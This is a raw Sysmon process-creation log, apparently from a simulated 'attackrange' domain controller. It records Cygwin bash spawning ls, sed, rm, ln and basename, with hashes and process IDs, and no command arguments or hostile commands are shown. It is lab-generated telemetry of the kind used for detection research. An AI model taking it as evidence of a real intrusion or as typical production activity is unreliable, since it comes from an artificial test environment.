154100x800000000000000057529Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.837{A8622C2F-5402-6078-4E0C-00000000AE01}924C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057519Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.828{A8622C2F-5402-6078-4D0C-00000000AE01}6432C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-4C0C-00000000AE01}5800C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057509Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.820{A8622C2F-5402-6078-4C0C-00000000AE01}5800C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-4B0C-00000000AE01}6552C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057499Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.812{A8622C2F-5402-6078-4B0C-00000000AE01}6552C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.803{A8622C2F-5402-6078-4A0C-00000000AE01}6332C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-490C-00000000AE01}5184C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.795{A8622C2F-5402-6078-490C-00000000AE01}5184C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-470C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057467Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.787{A8622C2F-5402-6078-480C-00000000AE01}5096C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-470C-00000000AE01}6748C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.779{A8622C2F-5402-6078-470C-00000000AE01}6748C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.770{A8622C2F-5402-6078-460C-00000000AE01}3200C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-450C-00000000AE01}6416C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057433Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.762{A8622C2F-5402-6078-450C-00000000AE01}6416C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-430C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057423Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.754{A8622C2F-5402-6078-440C-00000000AE01}2664C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-430C-00000000AE01}4696C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057411Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.746{A8622C2F-5402-6078-430C-00000000AE01}4696C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057399Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.738{A8622C2F-5402-6078-420C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-410C-00000000AE01}6364C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057389Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.730{A8622C2F-5402-6078-410C-00000000AE01}6364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057377Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.721{A8622C2F-5402-6078-400C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-3F0C-00000000AE01}5864C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.713{A8622C2F-5402-6078-3F0C-00000000AE01}5864C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.706{A8622C2F-5402-6078-3E0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-3D0C-00000000AE01}5628C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057347Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.698{A8622C2F-5402-6078-3D0C-00000000AE01}5628C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.689{A8622C2F-5402-6078-3C0C-00000000AE01}3176C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-3B0C-00000000AE01}4604C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.681{A8622C2F-5402-6078-3B0C-00000000AE01}4604C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-3A0C-00000000AE01}6432C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.673{A8622C2F-5402-6078-3A0C-00000000AE01}6432C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057305Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.664{A8622C2F-5402-6078-390C-00000000AE01}5832C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-380C-00000000AE01}4364C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057295Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.656{A8622C2F-5402-6078-380C-00000000AE01}4364C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-360C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.648{A8622C2F-5402-6078-370C-00000000AE01}3368C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-360C-00000000AE01}6332C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.640{A8622C2F-5402-6078-360C-00000000AE01}6332C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057261Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.631{A8622C2F-5402-6078-350C-00000000AE01}1100C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-340C-00000000AE01}1736C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057251Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.623{A8622C2F-5402-6078-340C-00000000AE01}1736C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-320C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057241Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.615{A8622C2F-5402-6078-330C-00000000AE01}6672C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-320C-00000000AE01}3200C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.607{A8622C2F-5402-6078-320C-00000000AE01}3200C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057217Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.600{A8622C2F-5402-6078-310C-00000000AE01}5344C:\cygwin64\bin\basename.exe-----"C:\cygwin64\bin\basename.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=AED8AC1AB11AAE8C1D7419413A62D44D,SHA256=AC27DE64030ACA88AFC06227567D12364AF0B121C0A47F04D549BFA03D0B6E96,IMPHASH=1FC5FB16CA0D89F0C4AB3D25E6FD9B83{A8622C2F-5402-6078-300C-00000000AE01}7140C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057207Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.591{A8622C2F-5402-6078-300C-00000000AE01}7140C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057195Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.583{A8622C2F-5402-6078-2F0C-00000000AE01}3156C:\cygwin64\bin\ln.exe-----"C:\cygwin64\bin\ln.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F7AD4972A563C9EF6C4900170F88D83,SHA256=A7D96AB536D123A651C9C3F729980E2967845021EE12AF2B9397654C1B6D9828,IMPHASH=780EE5A60A6D012573A93F16400D609B{A8622C2F-5402-6078-2E0C-00000000AE01}5852C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057185Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.574{A8622C2F-5402-6078-2E0C-00000000AE01}5852C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.567{A8622C2F-5402-6078-2D0C-00000000AE01}5144C:\cygwin64\bin\rm.exe-----"C:\cygwin64\bin\rm.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3A51D241547A83A7D680C1AAA6025CA2,SHA256=CA37C7AF9FB52FE23369A60B2371D06A67F2D943BA1C5AD551283055C2E2AC97,IMPHASH=0CB408B71E8CFCA4B8930235B85446CC{A8622C2F-5402-6078-2C0C-00000000AE01}6556C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057165Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.559{A8622C2F-5402-6078-2C0C-00000000AE01}6556C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057155Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.550{A8622C2F-5402-6078-2B0C-00000000AE01}1800C:\cygwin64\bin\ls.exe-----"C:\cygwin64\bin\ls.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=78510505DCF9B8AE9DB2A9E1D1E8107D,SHA256=68A3C434F639779FF71DFCD1A3DCE94C5D3CC1D8FFA4FC090D5E3140613C0BBF,IMPHASH=5F433535F19619074E0B3EBD48586FD5{A8622C2F-5402-6078-2A0C-00000000AE01}3304C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057145Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.542{A8622C2F-5402-6078-2A0C-00000000AE01}3304C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-290C-00000000AE01}3176C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.534{A8622C2F-5402-6078-290C-00000000AE01}3176C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057123Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.525{A8622C2F-5402-6078-280C-00000000AE01}6748C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-5402-6078-270C-00000000AE01}3220C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057113Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:56:02.517{A8622C2F-5402-6078-270C-00000000AE01}3220C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-250C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.509{A8622C2F-5402-6078-260C-00000000AE01}1156C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5402-6078-250C-00000000AE01}5832C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057091Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:02.501{A8622C2F-5402-6078-250C-00000000AE01}5832C:\cygwin64\bin\bash.exe-----"C:\cygwin64\bin\bash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5401-6078-DE0B-00000000AE01}6452C:\cygwin64\bin\bash.exe"C:\cygwin64\bin\bash.exe" 154100x800000000000000057079Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
